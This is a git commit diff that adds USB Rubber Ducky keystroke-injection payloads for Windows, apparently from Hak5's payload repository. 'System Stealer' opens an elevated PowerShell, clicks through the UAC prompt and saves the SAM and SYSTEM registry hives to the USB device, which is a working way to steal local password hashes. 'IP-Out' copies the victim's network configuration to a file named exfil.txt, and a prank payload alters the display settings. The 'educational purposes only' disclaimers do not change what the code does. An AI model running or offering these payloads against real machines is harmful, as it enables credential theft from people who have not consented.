Merge branch 'hak5:master' into master
commit
e3c28b36ee
|
@ -0,0 +1,12 @@
|
|||
# IP-OUT
|
||||
This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Useful Tips
|
||||
|
||||
**Change #DRIVELABEL to your own personal drive label if it isn't already**
|
||||
|
||||
Remember: Do not use this for unethical hacking practices! This is for educational purposed only!
|
|
@ -0,0 +1,63 @@
|
|||
REM Title: IP-Out
|
||||
REM Author: Mavisinator30001
|
||||
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
|
||||
REM Target: Any Windows System
|
||||
REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
|
||||
DEFINE #DRIVELABEL DUCKY
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
IF $_OS != WINDOWS
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
ATTACKMODE HID STORAGE
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 300
|
||||
STRINGLN Powershell
|
||||
DELAY 1000
|
||||
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
|
||||
WAIT_FOR_STORAGE_ACTIVITY
|
||||
WAIT_FOR_STORAGE_INACTIVITY
|
||||
ALT F4
|
||||
ATTACKMODE OFF
|
||||
HIDE_PAYLOAD
|
|
@ -0,0 +1,74 @@
|
|||
REM TITLE System Stealer
|
||||
REM AUTHOR mavisinator30001
|
||||
REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both
|
||||
REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!
|
||||
REM DISCLAIMER This is for educational purposes ONLY
|
||||
DELAY 1000
|
||||
ATTACKMODE HID STORAGE
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
REM Change $DRIVELABEL to the storage label of your duck
|
||||
DEFINE #DRIVELABEL DUCKY
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
DELAY 1000
|
||||
CTRL-SHIFT-ENTER
|
||||
DELAY 750
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
|
||||
DELAY 250
|
||||
STRINGLN reg save HKLM\sam $DriveLetter/sam.save
|
||||
WAIT_FOR_STORAGE_ACTIVITY
|
||||
WAIT_FOR_STORAGE_INACTIVITY
|
||||
STRINGLN reg save HKLM\system $DriveLetter/system.save
|
||||
WAIT_FOR_STORAGE_ACTIVITY
|
||||
WAIT_FOR_STORAGE_INACTIVITY
|
||||
ALT F4
|
||||
ELSE
|
||||
ATTACKMODE OFF
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
|
@ -0,0 +1,5 @@
|
|||
# Resolution Prank
|
||||
|
||||
This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed.
|
||||
|
||||
### Somewhat resource dependent, may not work on older computers
|
|
@ -0,0 +1,103 @@
|
|||
REM TITLE Resolution Prank
|
||||
REM AUTHOR Mavisinator30001
|
||||
REM TARGET Any system running Windows 10/11
|
||||
REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
IF $_OS != WINDOWS
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
LED_G
|
||||
DELAY 500
|
||||
CTRL GUI d
|
||||
DELAY 500
|
||||
GUI i
|
||||
DELAY 2000
|
||||
STRINGLN display
|
||||
DELAY 2500
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
REPEAT 8 TAB
|
||||
ENTER
|
||||
VAR $CAPS_STATE = $_CAPSLOCK_ON
|
||||
WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
|
||||
HOLD DOWN
|
||||
DELAY 1000
|
||||
RELEASE DOWN
|
||||
ENTER
|
||||
DELAY 200
|
||||
LEFT
|
||||
DELAY 200
|
||||
ENTER
|
||||
|
||||
REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED
|
||||
VAR $LIGHT_UP_TIMES = 20
|
||||
WHILE ($LIGHT_UP_TIMES > 0)
|
||||
LED_G
|
||||
DELAY 300
|
||||
LED_OFF
|
||||
DELAY 300
|
||||
LED_R
|
||||
DELAY 300
|
||||
LED_OFF
|
||||
DELAY 300
|
||||
$LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1
|
||||
END_WHILE
|
||||
WAIT_FOR_CAPS_CHANGE
|
||||
END_WHILE
|
||||
DELAY 300
|
||||
REPEAT 12 TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
HOLD UP
|
||||
DELAY 1000
|
||||
RELEASE UP
|
||||
ENTER
|
||||
DELAY 200
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 1000
|
||||
ALT F4
|
||||
DELAY 200
|
||||
CTRL GUI F4
|
Loading…
Reference in New Issue